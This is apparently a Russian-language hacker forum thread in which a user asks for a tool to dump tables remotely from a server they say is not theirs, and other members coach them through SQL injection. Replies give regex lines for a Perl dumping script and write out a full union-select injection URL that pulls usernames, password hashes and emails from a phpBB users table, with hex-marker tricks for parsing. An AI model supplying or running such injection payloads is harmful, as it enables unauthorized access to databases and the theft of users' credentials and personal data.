![]() |
Терасрочно...Нужен дампер содержимого таблиц.
Срочно нужен дампер содержимого таблиц MySql,либо mysql/mssql/n,где n - любая бд кроме MySql.С Велли плюсеги и храм впридачу )
|
Код:
http://sypex.net/products/dumper/downloads/ |
Эм...Я так понял,что это локальный дампер,а нужен удалённый:(:((типа SIPTа).Извиняюсь за внесённую дизинформацию)
|
просто отредактируй в скрипте строчку
PHP код:
UPD: ну или вот Код:
http://mentat.sibintercom.ru/Nemo/dump/rst_sql.txt |
Так я ж не знаю акка от бд =_=.К тому же,она на локалхосте...Установить на сам сервер я не могу её(на удалённый,НЕ мой).Я правильно понял ?
|
Ты хочешь через sql-injection сдампить?
|
Да
|
ставишь ActivePerl
сохраняешь код в scr.pl Код:
#!/usr/bin/perlт.е push @maillist, ($res->content =~ m/nvarchar value '([^']+)' to data/gmi); запускешь из cmd example: Цитата:
10 - число потоков 999 - До скольки перебирать _sh_ |
push @maillist, ($res->content =~ m/nvarchar value '([^']+)' to data/gmi);
Это два ответа или один ? Как это понять ? Например,при существовании таблицы ответ "yes",а при её отсутствии - "no".Как это записать ? Остальное вопросов не вызывает. ЗЫ: Сам вывод у меня идёт такой: select username from users where username=тут_вывод ORDER by t.priority, t.id ASC (script.php, 369) Вывод находится в исходниках страницы. |
епт, ну допустим запрос
Цитата:
Цитата:
nvarchar value ' и ' to data type Цитата:
push @maillist, ($res->content =~ m/username=([^']+)то что с права/gmi); Можно еще так сделать concat_ws(0x72747274727472,0x3a,username,0x3a,0x72 747274727472) 0x72747274727472 = rtrtrtr тогда push @maillist, ($res->content =~ m/rtrtrtr: ([^']+):rtrtrtr/gmi); |
C:\Documents and Settings\Vlad\Desktop>scr.pl "http://site.ru/script.php?&id=-3910+union+select+1,2,concat_ws(0x3a,username,user
_password,user_mail),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+from+lhammer_forum.ph pbb_users+limit+_sh_,1--" 10 5 Тест фаил создаётся,но пустой.Мэиллист не создаётся.если ставлю вместо 5 999,то пишет scalar leacked: 1 и создаёт также пустой фаил maillist.txt Не знаю,в чём дело...но в скрипт вписал: push @maillist, ($res->content =~ m/Unknown column '([^']+)' in 'where clause'/gmi); Попробую ещё на других сайтах |
мдауж... в элементарном скрипте разобраться не могут, ну и хакеры пошли, привыкли закидывать скуль в программу и смотреть как та её "раскручивает" =\
Вот такой запрос у тебя должен быть: scr.pl "http://site.ru/script.php?&id=-3910+union+select+1,2,concat_ws(0x72747274727472,0 x3a,username,user _password,user_mail,0x3a,0x72747274727472),4,5,6,7 ,8,9,10,11,12,13,14,15 ,16,17,18,19+from+lhammer_forum.phpbb_users+limit+ _sh_,1--" 10 5 В скрипте исправь push @maillist, ($res->content =~ m/rtrtrtr: ([^']+):rtrtrtr/gmi); |
| Время: 07:27 |